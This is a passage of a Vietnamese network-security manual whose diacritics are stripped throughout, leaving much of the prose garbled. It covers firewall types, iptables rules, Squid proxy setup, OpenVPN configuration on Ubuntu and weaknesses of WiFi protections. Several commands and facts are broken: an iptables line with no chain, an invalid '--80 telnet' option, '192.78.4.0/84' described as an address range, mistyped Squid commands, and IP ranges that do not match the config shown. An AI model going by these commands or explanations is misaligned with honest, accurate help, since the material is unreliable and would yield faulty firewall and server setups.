To cc Access Control List (bn trn). 5. Firewall v Proxy a. Khi nim Firewall Thut ng Firewall c ngun gc t mt k thut thit k trong xy dng ngn chn, hn ch ha hon. Trong cng ngh thng tin, Firewall l mt k thut c tch hp vo h thng mng chng s truy cp tri php, nhm bo v cc ngun thng tin ni b v hn ch s xm nhp khng mong mun vo h thng. Firewall c miu t nh l h phng th bao quanh vi cc cht kim sot tt c cc lung lu thng nhp xut. C th theo di v kha truy cp ti cc cht ny. Cc mng ring ni vi Internet thng b e da bi nhng k tn cng. bo v d liu bn trong ngi ta thng dng firewall. Firewall c cch no cho php ngi dng hp i qua v chn li nhng ngi dng khng hp l. Firewall c th l thit b phn cng hoc chng trnh phn mm chy trn host bo m hoc kt hp c hai. Trong mi trng hp, n phi c t nht hai giao tip mng, mt cho mng m n bo v, mt cho mng bn ngoi. Firewall c th l gateway hoc im ni lin gia hai mng, thng l mt mng ring v mt mng cng cng nh l Internet. Cc firewall u tin l cc router n gin. b. Chc nng ca Firewall Chc nng chnh ca Firewall l kim sot lung thng tin t gia Intranet v Internet. Thit lp c ch iu khin dng thng tin gia mng bn trong (Intranet) v mng Internet.

Cho php hoc cm nhng dch v truy cp ra ngoi. Cho php hoc cm nhng dch v t ngoi truy cp vo trong.

Page | 58 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012


7, 2012

Theo di lung d liu mng gia Internet v Intranet Kim sot a ch truy nhp, cm a ch truy nhp Kim sot ngi s dng v vic truy cp ca ngi s dng. Kim sot ni dung

thng tin lu chuyn trn mng. Mt firewall kho st tt c cc lung lu lng gia hai mng xem n c t chun hay khng. Nu n t, n c nh tuyn gia cc mng, ngc li n b hy. Mt b lc firewall lc c lu lng ra ln lu lng vo. N cng c th qun l vic truy cp t bn ngoi vo ngun ti nguyn mng bn trong. N c th c s dng ghi li tt c cc c gng vo mng ring v a ra cnh bo nhanh chng khi k th hoc k khng c phn quyn t nhp. Firewall c th lc cc gi da vo a ch ngun, a ch ch v s cng ca chng. iu ny cn c gi l lc a ch. Firewall cng c th lc cc loi c bit ca lu lng mng. iu ny c gi l lc giao thc bi v vic ra quyt nh cho chuyn tip hoc t chi lu lng ph thuc vo giao thc c s dng, v d HTTP, FTP hoc Telnet. Firewall cng c th lc lung lu lng thng qua thuc tnh v trng thi ca gi. Mt s firewall c chc nng th v v cao cp, nh la c nhng k xm nhp rng h ph v c h thng an ton. V c bn, n pht hin s tn cng v tip qun n, dn dt k tn cng i theo bng tip cn nh phn chiu (hall of mirrors). Nu k tn cng tin rng h vo c mt phn ca h thng v c th truy cp xa hn, cc hot ng ca k tn cng c th c ghi li v theo di. Nu c th gi k ph hoi trong mt thi gian, ngi qun tr c th ln theo du vt ca h. V d, c th dng lnh finger theo vt k tn cng hoc to tp tin by mi h phi mt thi gian truyn lu, sau theo vt vic truyn tp tin v ni ca k tn cng qua kt ni Internet. c. Nguyn l hot ng ca Firewall Cc rule ca Firewall hot ng tng t nh Access Control List ca Router, Rule ca firewall c kh nng lc gi tin su hn ACL. Firewall hot ng cht ch vi giao thc TCP/IP, v giao thc ny lm vic theo thut tn chia nh cc d liu nhn c t cc ng dng trn mng, hay ni chnh xc hn l cc dch v chy trn cc giao thc (Telnet, SMTP, DNS, SMNP, NFS ) thnh cc gi d liu (data packets) ri gn cho cc packet ny nhng a ch c th nhn dng, ti lp li ch cn gi n, do cc loi Firewall cng lin quan rt nhiu n cc packet v nhng con s a ch ca chng. Page | 59 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

B lc packet cho php hay t chi mi packet m n nhn c. N kim tra ton b on d liu quyt nh xem on d liu c tha mn mt trong s cc lut l ca lc packet hay khng. Cc lut l lc packet ny l da trn cc thng tin u mi packet (header), dng cho php truyn cc packet trn mng. Bao gm: a ch IP ni xut pht (Source) a ch IP ni nhn ( Destination) Nhng th tc truyn tin (TCP, UDP, ICMP, IP tunnel ) Cng TCP/UDP ni xut pht Cng TCP/UDP ni nhn Dng thng bo ICMP Giao din packet n Giao din packet i Firewall c th bc tch d liu trong gi tin Layer 6,7: Filetype, URL, Content, Services, Application, User,.. d. Cc loi Firewall Nu chia theo v tr t: - Network Firewall: bo v cho c h thng mng - Host Firewall: Bo v cho mt my tnh c ci t (thng c tch hp trn OS hoc cc phn mm bo mt nh Anti-Virus, Endpoint Security). - Web Firewall: C th l Network Firewall hoc Host Firewall c chc nng bo v dch v web trc cc dng tn cng. Nu theo nn tng hardware v software - Software Firewall: Thng c ci t trn OS hoc l h iu hnh Linux tch hp firewall mm - Hardware Firewall: c ti u ha bng vic xy dng h iu hnh trn nn tng phn cng ca hng nn hiu nng x l tt hn. Nu theo kh nng x l gi tin - Packet Filter: Hot ng Layer3 4 M hnh OSI. Cho php lc gi tin hai lp ny, Firewall dng ny c th coi nh Acess Control List trn Router.

Page | 60 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- Application Filter: Hot ng Layer 7. Cho php to ra cc Rules hot ng trn Layer 7 ca m hnh mng OSI nh URL, Content. - State Full Filter: Hot ng t Layer 3 7: Cho php to rules phc to t IP, Port, URL, Filetype, time, User, content, Header, - UTM: Tch hp gia Firewall v UTM. Do nhiu tnh nng nn hiu nng x l khng c cao. Khi nim mi v mt th h mi Firewall c Gartner (t chc nh gi cc gii php IT) nh ngha l: Next Generation Firewall cn phi c cc tnh nng sau: H tr hot ng Inline trong h thng mng (c th hot ng trong sut t Layer 2) C nhng tnh nng Firewall c bn: Packet Filter, NAT, Statefull, VPN H tr pht hin h thng mng (Host active, Service, Application, OS, Vulnerability). Tch hp IPS mc su (cho php cu hnh, rule edit, Event Impact Flag) Application Awareness: Cho php pht hin cc dch v h thng, a ra cc policy su nh cm c Skype, Yahoo Messager Extrafirewall Inteligence: V d cho php block mt user no ng nhp vo Facebook cn cc user cn li vn truy cp c. H tr update signature lin tc m bo h thng lun c bo mt.

Gartner a ra khi nim v Firewall v l tnh nng ca cc firewall hin nay, rt nhiu sch ti c thy cha h a khi nim ny vo trong khi thc t trin khai rt nhiu h thng ny. e. Thit k Firewall trong m hnh mng Thit k firewall ph hp vi h thng mng l rt quan trng, di y ti trnh by mt s m hnh trin khai firewall: Router lm chc nng Packet Filter

Page | 61 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Firewall p dng cho vng DMZ

M hnh mng tch hp ti mt n v (v d)

Page | 62 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

M hnh mng tch hp Firewall v d khc Trong m hnh ny c thit b: Firewall, Proxy chuyn dng ca BlueCoat, IPS Sourcefire, Cn bng ti cho nhiu ng internet, UTM Firewall cng nhiu thit b v gii php bo mt khc.

Page | 63 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

6. Cu hnh firewall IPtable trn Linux Trong h thng Unix/Linux c rt nhiu Firewall...Trong s c mt Firewall c cu hnh v hot ng trn nn Console rt nh v tin dng = = > l Iptables. Bi vit ny khng c nh trnh by chi tit v cch s dng Iptables. Nhng ti hy vng l qua n bn c th phn no hiu v cu hnh c Iptables mc c bn... Trc ht bn cn phi hiu Firewall Iptables s x l nh th no i vi nhng packets leaving, entering hay passing i vo hay i ra t PC. - Bt k Packet no mun i vo PC ca bn u phi i qua Input Chain. - Bt c Packet no t PC ca bn mun i ra ngoi Network u phi i qua Output Chain.

Page | 64 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- Bt c Packet no m PC ca bn mun gi i mt Destination khc u phi i qua Forward Chain Tt c nhng iu nu trn u c gim st bi Iptables...V tt nhin l Iptables phi c ci t v thit lp :-) Vic thit lp cu hnh cho Input Chain, Output Chain v Forward gi l thit lp ni quy (rules) cho Firewall. Hu ht Iptables c ci t trong nhn ca mt s Version Linux thng dng hin nay: Redhat, Mandrake, SuSe.. Nu khng bn c th tm thy Iptables : http://www.linuxapps.com/ http://www.linuxapps.com/ http://www.freshmeat.net/ Mt s cu hnh n gin Mt s Port v Service thong dng trn mt h thng Unix/Linux: Port 21 22 23 25 53 79 80 110 111 443 901 1024 3306 6000 Protocol TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP Service FTP SSH TELNET SMTP NAME (DNS) FINGER HTTP POP3 SUNRPC HTTPS SAMBA-SWAT KDM MYSQL X11

By gi chng ta bt u tm hiu nhng chc nng v cch cu hnh c bn ca Iptables. V d: Khi PC ca bn send mt Packet n http://www.yahoo.com/ yu cu hi p trang HTML. Th trc ht n phi c chuyn qua Output Chain. Lc ny cc ni quy (rule) s hot ng, n s kim tra yu cu Send Packet. Nu yu cu hp l th Packet s c i. Page | 65 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Tip khi Yahoo Reply Packet v my bn th n cng s phi i qua Input Chain. ng nhin l n phi ph hp c vi cc Rule th mi c vo my ca bn. Rc ri v phc tp c y nh hi quan Ni Bi Air Port phi khng ? Chng ta bt u thao tc vi nhng a ch IP nht nh. Chng hn nh bn mun ngn chn tt c cc Packet n t 192.78.4.0 -s l tu chn ngn chn mt a ch IP hay DNS ngun. Tng t ta c dng lnh: iptables -s 192.78.4.0 Nu bn mun x l cc Packet mt cch chi tit hn. Th tu chn -j s gip bn thc hin iu nh: ACCEPT, DENY hay DROP (s dng kt hp vi tu chn -s nh)...Chc ti khng cn phi a ra ngha ting vit ca 3 t ACCEPT, DENY, DROP na nh. Nu bn mun DROP cc Packet t a ch 192.78.4.0 : iptables -s 192.78.4.0 -j DROP DENY hay ACCEPT cng tng t nh ;-p Lnh n trn s b qua mi th n t 192.78.4.0 Chng ta cn c th b qua mt PC nht nh trn mt mng. Nu bn khng mun nhng PC trong mng lin lc v ni chuyn vi PC hay lin lc ra ngoi. Bn ch cn thay i tham s Input, Output v thay i tu chn -s, -d Nu chng ta mun b qua yu cu phn hi Telnet t my PC ny. Trong trng hp ny c t nht 3 giao thc c th c ch r: TCP, UDP v ICMP. Tu chn -p c s dng ch r chi tit giao thc cn x l. Telnet l mt giao thc hot ng trn Port 23/TCP ln chng ta s c dng lnh: iptables -A INPUT -s 192.78.4.0 -p tcp --80 telnet -j DROP Cc Command trn l thao tc cho 1 a ch IP (Single IP). Nu bn mun thao tc vi nhiu a ch IP cng mt lc (Multi IP) th s c cht thay i nh nh sau: - 192.78.4.0/84 = = > Tt cc cc IP t 192.78.4.0 cho n 192.78.4.84 Page | 66 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- 192.78.4.* = = > Tt c cc IP thuc lp mng D. T 192.78.4.0 cho n 192.78.4.255 Cu hnh phc hp ln mt cht (mt cht thi nha) Bn c mt mng LAN v c mt kt ni Internet. Chng ta s nht tr coi LAN l eth0 cn kt ni Internet l ppp0. Bn mun cho php dch v Telnet chy trn cc PC trong mng LAN nhng khng mun cho n hot ng ngoi Internet (v nhng l do an ton). ng lo Iptables s lo cho bn iu ny. Bn c th s dng tu chn -i v -o. Cch ngn chn trn Output Chain t ra hp l hn l cch ngn chn Input Chain. Bn c th s dng thm tu chn -i iptables -A INPUT -p tcp --destination-port telnet -i ppp0 -j DROP Command trn s ngn chn tt c cc yu cu, nguy c tn cng bng Telnet t bn ngoi vo h thng LAN ca bn. Nu bn bit c cc Packet s dng nhng Protocol nht nh, nu n l TCP th bn cng c th d dng bit c Port m n s dng. Khi hai PC kt ni vi nhau qua giao thc TCP. Th trc tin kt ni phi c khi to trc. y l cng vic ca mt gi SYN. Mt SYN Packet s lm nhim v ni vi mt PC khc rng n sng sng kt ni. By gi ch mt PC i hi gi mt SYN Packet. Nu bn ngn chn nhng gi SYN vo. N s Stop cc PC khc t nhng Service ang c Open. iu c ngha l n s ngn chn c cc PC trong LAN ca bn vi cc PC ngoi Internet: iptables -A INPUT -i ppp0 -p tcp --syn -j DROP Nu bn vn mun duy tr mt Service nhng li khng mun cc PC ngoi Internet truyn thng vi n. Ch cho cc PC trong LAN truyn thng vi nTh bn c th ngn chn tt cc SYN Packet trn Port ca Service : iptables -A INPUT -i ppp0 -p tcp --syn --destination-port ! 80 -j DROP Theo mc nh th Input Chain v Output Chain lun c cu hnh ch Accept. Cn Forward lun c thit lp ch Deny. Nu bn mun s dung Server v Firewall nh mt Router. Bn phi cu hnh cho Forward ch Accept

Page | 67 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Hin trn Internet c rt nhiu Script cu hnh Rules cho Iptables rt tuyt. Bn c th Down chng v p dng ngay trn h thng ca mnh lun. Cng c mt s cng c cu hnh Iptables trn X . Li kt Bo mt lun l mt vn phc tp tn nhiu giy mc. Hy vng qua bi vit ny bn s hiu v nm c cch s dng Iptables. Mi th u ch mang tnh cht tng i. V vy nu mun giu cho h thng ca mnh an ton. Bn lun phi xem xt kim tra Firewall, cc Bug...V lun trng thi trc chin mc cao nht... 7. Ci t v cu hnh SQUID lm Proxy Server a. Linux SQUID Proxy Server: Squid l mt proxy server, kh nng ca squid l tit kim bng thng(bandwidth), ci tin vic bo mt, tng tc truy cp web cho ngi s dng v tr thnh mt trong nhng proxy ph bin c nhiu ngi bit n. Hin nay, trn th trng c rt nhiu chng trnh proxy-server nhng chng li c hai nhc im, th nht l phi tr tin s dng, th hai l hu ht khng h tr ICP ( ICP c s dng cp nht nhng thay i v ni dung ca nhng URL sn c trong cache l ni lu tr nhng trang web m bn tng i qua ). Squid l s la chn tt nht cho mt proxy-cache server, squid p ng hai yu cu ca chng ta l s dng min ph v c th s dng c trng ICP. Squid a ra k thut lu tr cp cao ca cc web client, ng thi h tr cc dch v thng thng nh FTP, Gopher v HTTP. Squid lu tr thng tin mi nht ca cc dch v trn trong RAM, qun l mt c s d liu ln ca cc thng tin trn a, c mt k thut iu khin truy cp phc tp, h tr giao thc SSL cho cc kt ni bo mt thng qua proxy. Hn na, squid c th lin kt vi cc cache ca cc proxy server khc trong vic sp xp lu tr cc trang web mt cch hp l. Sau y chng ta s thc hin cch thc ci t mt Proxy server nh th no.

b. Ci t: u tin chng ta nn c mt s khi nim v i hi phn cng ca mt proxy server:

Page | 68 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

*** Tc truy cp a cng : rt quan trng v squid thng xuyn phi c v ghi d liu trn cng. Mt a SCSI vi tc truyn d liu ln l mt ng c vin tt cho nhim v ny. *** Dung lng a dnh cho cache ph thuc vo kch c ca mng m Squid phc v. T 1 n 2 Gb cho mt mng trung bnh khong 100 my. Tuy nhin y ch l mt con s c tnh cht v d v nhu cu truy cp Internet mi l yu t quyt nh s cn thit ln ca a cng. *** RAM : rt quan trng, t RAM th Squid s chm hn mt cch r rng. *** CPU : khng cn mnh lm, khong 133 MHz l cng c th chy tt vi ti l 7 requests/second. Ci t Squid vi RedHat Linux rt n gin. Squid s c ci nu bn chn n trong qu trnh ci t ngay t u. Hoc nu bn ci Linux khng Squid, bn c th ci sau qua tin ch rpm vi lnh : rpm i tn_gi_Squid Khi squid s c ci v bn c th bc qua phn cu hnh squid. Cc th mc mc nh ca squid: /usr/sbin /etc/squid /var/log/squid Ci t t source : + Ta c file source ca squid l squid-version.tar.gz, ta thc hin cc bc lnh sau: tar xzvf squid-version.tar.gz cd squid-version

Page | 69 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

./configure make make install Sau khi ta thc hin cc lnh trn, coi nh ta ci t xong squid.

c.

Cu hnh Squid:

- Sau khi ci t xong squid, ta phi cu hnh squid ph hp vi tng yu cu ring. Ta cu hnh mt s tham s trong file /etc/squid/squid.conf nh sau: ** http_port: mc nh l 3128. ** icp_port: mc nh l 3130. ** cache_dir: khai bo kch thc th mc cache cho squid, mc nh l: cache_dir /var/spool/squid/cache 100 16 256 Gi tr 100 tc l dng 100MB lm cache, nu dung lng a cng ln, ta c th tng thm tu thuc vo kch thc a. Nh vy squid s lu cache trong th mc /var/spool/squid/cache vi kch thc cache l 100MB. ** Access Control List v Access Control Operators: ta c th dng hai chc nng trn ngn chn v gii hn vic truy xut da vo destination domain, IP address ca my hoc mng. Mc nh squid s t chi phc v tt c, v vy ta phi cu hnh li tham s ny. c vy, ta cu hnh thm cho thch hp vi yu cu bng hai tham s l : acl v http_access. V d: Ta ch cho php mng 172.16.1.0/24 c dng proxy server bng t kho src trong acl. acl MyNetwork src 172.16.1.0/255.255.255.0 http_access allow MyNetwork

Page | 70 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

http_access deny all + Ta cng c th cm cc my truy xut n nhng site khng c php bng t kho dstdomain trong acl, v d: acl BadDomain dstdomain yahoo.com http_access deny BadDomain http_access deny all + Nu danh sch cm truy xut n cc site di qu, ta c th lu vo 1 file text, trong file l danh sch cc a ch nh sau: acl BadDomain dstdomain /etc/squid/danhsachcam http_access deny BadDomain + Theo cu hnh trn th file /etc/squid/danhsachcam l file vn bn lu cc a ch khng c php truy xut c ghi ln lt theo tng dng. + Ta c th c nhiu acl, ng vi mi acl phi c mt http_access nh sau: acl MyNetwork src 172.16.1.0/255.255.255.0 acl BadDomain dstdomain yahoo.com http_access deny BadDomain http_access allow MyNetwork http_access deny all + Nh vy cu hnh trn cho ta thy proxy cm cc my truy xut n site www.yahoo.com v ch c mng 172.16.1.0/24 l c php dng proxy. http_access deny all: cm tt c ngoi tr nhng acl c khai bo.

Page | 71 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Nu proxy khng th kt ni trc tip vi Internet v khng c a ch IP thc hoc proxy nm sau mt Firewall th ta phi cho proxy query n mt proxy khc c th dng Internet bng tham s sau : cache_peer ITdep.hcmutrans.edu.vn parent 8080 8082

+ Cu hnh trn cho chng ta thy proxy s query ln proxy cha l ITdep.hcmutrans.edu.vn vi tham s parent thng qua http_port l 8080 v icp_port l 8082. Ngoi ra trong cng mt mng nu c nhiu proxy server th ta c th cho cc proxy server ny query ln nhau nh sau: cache_peer proxy2.hcmutrans.edu.vn sibling 8080 8082 cache_peer proxy3.hcmutrans.edu.vn sibling 8080 8082 sibling dng cho cc proxy ngang hng vi nhau. d. Khi ng Squid: Sau khi ci t v cu hnh li squid, ta phi to cache trc khi chy squid bng lnh: squid z Nu trong qu trnh to cache b li, ta ch n cc quyn trong th mc cache c khai bo trong tham s cache_dir. C th th mc khng c php ghi. Nu c ta phi thay i bng: chown squid:squid /var/spool/squid chmod 770 /var/spool/squid Sau khi to xong th mc cache, ta khi ng v dng squid bng script nh sau: /etc/init.d/squid star /etc/init.d/squid stop

Page | 72 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Sau khi squid khi ng, mun theo di v qun l vic truy cp ca cc client hay nhng g squid ang hot ng cache nh th no, ta thng xuyn xem xt nhng file sau y: *** cache_log: bao gm nhng cnh bo v thng tin trng thi ca cache *** store_log: bao gm nhng c s d liu v nhng thng tin g mi c cp nht trong cache v nhng g ht hn *** access_log: cha tt c nhng thng tin v vic truy cp ca client, bao gm a ch ngun, ch n, thi gian

V phn Server ci t xong, cn v pha client, bn phi hiu chnh li cu hnh a ch ca Server v port proxy ca Server, v d nh hnh sau:

Page | 73 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

8. Trin khai VPN trn nn tng OpenVPN a. Tng quan v OpenVPN. OpenVPN l mt cng c m ngun m c s dng xy dng mng ring o siteto-site (cc chi nhnh trong cng ty) vi giao thc SSL / TLS hoc vi cc kha chia s b mt PSK (pre-share keys). N c vai tr bo m ng hm d liu thng qua mt cng TCP / UDP trn mt mng khng an ton nh Internet, do cn thit lp mng ring o. OpenVPN c th c ci t trn gn nh bt k nn tng bao gm c Linux, Windows 2000/XP/Vista, OpenBSD, FreeBSD, NetBSD, Mac OS X, v Solaris. Cc h thng Linux cn phi c nhn linux kernel 2.4 hoc phin bn cao hn. Nguyn tc cu hnh vn ging nhau trn bt k nn tng no. OpenVPN da trn kin trc client / server. N phi c ci t trn cc thnh vin VPN, c ch nh trong nhng my ch cng nh my khch. OpenVPN to ra mt ng hm TCP hoc UDP, sau m ha d liu bn trong ng hm. S hiu cng mc nh ca OpenVPN l UDP 1194, da trn mt cng c gn bi t chc cp pht s hiu Internet IANA (Internet Assigned Numbers Authority). Bn c th s dng cng TCP hoc UDP t phin bn xut 2.0, mt cng c bit duy nht c th c s dng cho mt s ng hm trn my ch OpenVPN. Bn c th chn xy dng hoc Ethernet (Bridged) hoc IP (Routed) VPN vi s tr gip tng ng ca trnh iu khin mng TAP hoc TUN. TAP / TUN c sn trn tt c cc nn tng v c i km vi nhn Linux kernel 2.4 hoc cao hn. Cc ty chn OpenVPN l c bit quan trng, v d my ch c th y cc tuyn ng mng trn my khch hoc c th c s dng nh l my ch DHCP. Khi s dng cc kha static, hai cng VPN chia s cng kha m v gii m d liu. Trong trng hp ny, cc cu hnh s n gin nhng vn l bn cn phi a kha (trn mt knh an ton) n ai m bn khng nht thit phi tin tng u kia ca ng hm.

Page | 74 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

H tng kha cng khai - Public Key Infrastructure (PKI) c s dng gii quyt vn ny. N da trn vic, mi bn s hu hai kha, mt kha cng khai (Public Key) c bit n vi tt c mi ngi v mt kho ring (Private Key) c gi b mt. Qu trnh ny c s dng bi OpenSSL, min ph v l phin bn ngun m ca SSL, c tch hp trong OpenVPN, xc thc cc VPN cng mc trc khi tin hnh m ha d liu. Hy xem nhng u im ca hai ch : OpenVPN mode Ch mt m Pre-shared keys i xng SSL Bt i xng Kh khn Chm Cao Khng C C xng/i

Thc hin Tc CPU s dng Trao i kha Thay i mi kha m

D dng Nhanh Thp C Khng

Xc thc thnh phn ngang Khng hng

b. Trin khai OpenVPN vi SSL trn mi trng Ubuntu linux OpenVPN s dng kha cng khai Public Key Infrastructure (PKI) m ha bng thng VPN gia cc node. Mt cch n gin ca vic thit lp mt VPN vi OpenVPN l kt ni cc client thng qua mt interface cu ni trn my ch VPN. Hng dn ny s gi nh vi mt node VPN, cc my ch trong trng hp ny, c cu hnh mt giao din cu ni. Bc 1: Ci t OpenVPN. ci t OpenVPN trong terminal ca ubuntu nhp: sudo apt-get install openvpn Page | 75 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Bc 2: M hnh trin khai M hnh trin khai VPN. Serer-PT lm my ch VPN server v Client PC-PT ng vai tr l VPN client kt ni n Server thng qua Internet. Server VPN ci t h iu hnh ubuntu server. Client ci t h iu hnh Ubuntu desktop.

Bc 3: Thit lp Server Certificates

Sau khi ci t xong OpenVPN, ta s to certificates cho VPN server. u tin, sao chp th mc easy-rsa n/etc/openvpn. iu ny s m bo rng bt k thay i i vi cc kch bn s khng b mt khi cc gi phn mm c cp nht. Bn cng s cn phi iu chnh cc iu khon trong th mc easy-rsa cho php ngi dng hin ti to ra cc tp tin. T terminal nhp.

sudo mkdir /etc/openvpn/easy-rsa/ sudo cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* /etc/openvpn/easy-rsa/ sudo chown -R $USER /etc/openvpn/easy-rsa/

Page | 76 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Tip theo, chnh sa /etc/openvpn/easy-rsa/vars theo thng tin ca bn: export KEY_COUNTRY="VN" export KEY_PROVINCE="NC" export KEY_CITY="HANOI" export KEY_ORG="NETPRO-ITI" export KEY_EMAIL="chiennv@netpro.edu.vn"

Nhp to server certificates:

cd /etc/openvpn/easy-rsa/ source vars ./clean-all #./build-ca ./build-key-server server ./build-dh ./pkitool --initca ./pkitool --server server cd keys openvpn --genkey --secret ta.key sudo cp server.crt server.key ca.crt dh1024.pem ta.key /etc/openvpn/ Page | 77 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Bc 4: thit lp client certificates Cc VPN Client cng cn mt certificate xc thc n my ch. to ra certificate, nhp chui sau y vo terminal: cd /etc/openvpn/easy-rsa/ source vars ./pkitool hostname Thay th hostname vi tn my thc t kt ni vi VPN Sao chp cc tp tin sau y cho Client /etc/openvpn/ca.crt /etc/openvpn/easy-rsa/keys/hostname.crt /etc/openvpn/easy-rsa/keys/hostname.key /etc/openvpn/ta.key

Nh iu chnh tp tin cho hostname ca my Client Tt nht l s dng phng php an ton sao chp cc certificate v key. Tin ch SCP l mt la chn tt, nhng sao chp cc tp tin truyn thng cho Client cng c th lm vic tt. Bc 5: Cu hnh cho server By gi cu hnh my ch OpenVPN bng cch to ra /etc/openvpn/server.conf t tp tin example. Trong terminal nhp: sudo cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/ sudo gzip -d /etc/openvpn/server.conf.gz iu chnh /etc/openvpn/server.conf thay i theo cu hnh di y: local 192.168.78.128

Page | 78 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

dev tap0 [file ca filename.crt phai chuan /etc/openvpn/] [cert,key cung tuong tu] ;up "/etc/openvpn/up.sh br0" ;down "/etc/openvpn/down.sh br0" ;server 10.8.0.0 255.255.255.0 server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100 push "route 192.168.78.128 255.255.255.0" push "dhcp-option DNS 192.168.78.128" ;push "dhcp-option DOMAIN netpro.edu.vn" tls-auth ta.key 0 # This file is secret user nobody group nogroup log-append openvpn.log verb 2

local: l ac h IP ca giao din cu ni. server-bridge: cn khi cu hnh s dng cu ni. 172.18.100.101 255.255.255.0 l phn giao din cu ni v mt n. Phm vi IP 172.18.100.105 172.18.100.200 l phm vi a ch IP s c giao cho clients. push: l ch th thm cc kt ni mng cho Client user and group: cu hnh m ngi dng v nhm OpenVPN daemon thc hin

Page | 79 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Thay th tt c cc a ch IP v tn min trn vi mng ca bn Tip theo, to ra mt vi kch bn thm giao din khai thc cu ni. To /etc/openvpn/up.sh: #!/bin/sh BR=$1 DEV=$2 MTU=$3 /sbin/ifconfig $DEV mtu $MTU promisc up /usr/sbin/brctl addif $BR $DEV V /etc/openvpn/down.sh: #!/bin/sh BR=$1 DEV=$2 /usr/sbin/brctl delif $BR $DEV /sbin/ifconfig $DEV down Sau phn quyn: sudo chmod 755 /etc/openvpn/down.sh sudo chmod 755 /etc/openvpn/up.sh V cu hnh my ch, khi ng li OpenVPN bng cch nhp: sudo /etc/init.d/openvpn restart Bc 6: Cu hnh cho client.

Page | 80 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

u tin ci OpenVPN cho Client: sudo apt-get install openvpn Sau vi cu hnh my ch v certificates ca client sao chp vo th mc /etc/openvpn/, to ra mt tp tin cu hnh client bng cch sao chp cc example. Trong terminal ca my client nhp: sudo cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn Thay i /etc/openvpn/client.conf theo cu hnh: dev tap remote 192.168.78.128 1194 cert hostname.crt key hostname.key tls-auth ta.key 1 Thay th vpn.example.com bng hostname my ch VPN ca bn, v hostname.* vi actual certificate v key filenames. Cui cng restart OpenVPN: sudo /etc/init.d/openvpn restart By gi bn c th kt ni mng Lan t xa vi VPN

Page | 81 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

9. ng dng VPN bo v h thng Wifi a. Cc phng thc bo mt Wifi Phn ny ti s trnh by gii php bo mt cho dch v Wi-Fi. Hin nay mng WiFi c s dng rt rng ri nhng nhiu ngi cha hiu ht nhng l hng bo mt tn ti trong h thng mng WiFi. Bi vit ny gii thiu cng ngh ng dng VPN vo bo mt mng WiFi. Nhng tnh nng bo mt tch hp sn trn Access Point: - Khng Broadcast SSID Khng Broadcast SSID c th l mt gii php chng mt s k t m v hiu bit khng cao v mng Wireless. i tng ny i khi cng khng nguy him. Ngoi ra SSID bt buc phi truyn trn mi gi tin ca mng khng dy, SSID v MAC khng c m ha khi truyn thng tin trn mng. Bt k mt cng c tn cng mng Wireless no u c th pht hin ra cc mng khng Broadcast SSID - MAC Address Filter Tnh nng cu hnh trn Access Point ch cho php mt s a ch MAC nht nh truy cp ti Access Point. , gii php ny c v c, nhng tht khng may hin nay rt nhiu tools cho php tm gi tin ca mng Wireless, a ch MAC v SSID khng c m ha trn bt k gi tin no v k tn cng d dng pht hin ra nhng a ch MAC c quyn truy cp ti Access Point. Hin nay cng c rt nhiu Tools cho php gii mo a ch MAC. - WEP y l phng thc m ha s dng Share Key gia thit b v Access Point nhng rt tic phng thc bo mt ny c rt nhiu Tools c th gii m gi tin v n chm Key. - WPA C v bo mt y, nhng tht khng may cc tool Crack Wireless mi nht hin nay nh Air Crack h tr tn cng h thng mng Wireless s dng giao thc m ha ny. Vy chng ta b tay sao - Hin nay c mt gii php bo mt mng Wireless duy nht c th tin tng l s dng gii php VPN. - M hnh trin khai VPN cho Access Point nh hnh di y:

Page | 82 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

b. Thit lp cu hnh trn thit b Access Point v VPN Server 2003


- Cu hnh trn Access Point - Cu hnh Enable tnh nng VPN trn my ch Windows Server 2003 - To kt ni VPN t cc thit b truy cp Wireless (Laptop). - Ti s dng Access Point ca Linksys - Thit b bao gm: 1 Port ra Internet, 4 Port LAN - Cm dy t Switch vo Port Internet, ti khng cn quan tm ti 4 Port LAN - Hon thnh cc bc trn ti truy cp vo Access Point bt u cu hnh, sau khi truy cp vo Access Point qua giao din Web ti cu hnh a ch IP cho Access Point. - Port Internet trn Access Point ti t a ch l: 192.168.50.33, cc thng s ti thit lp nh trn Hnh di y. - a ch IP lm Gateway cc thit b Wi-Fi ti t: 192.168.1.1 - a ch IP gn cho cc thit b kt ni ti Access Point l gii: 192.168.1.0/24 - Hon thnh cc bc trn ti cu hnh tnh nng Security cho cc kt ni Wi-Fi

Page | 83 Copyright by Tocbatdat

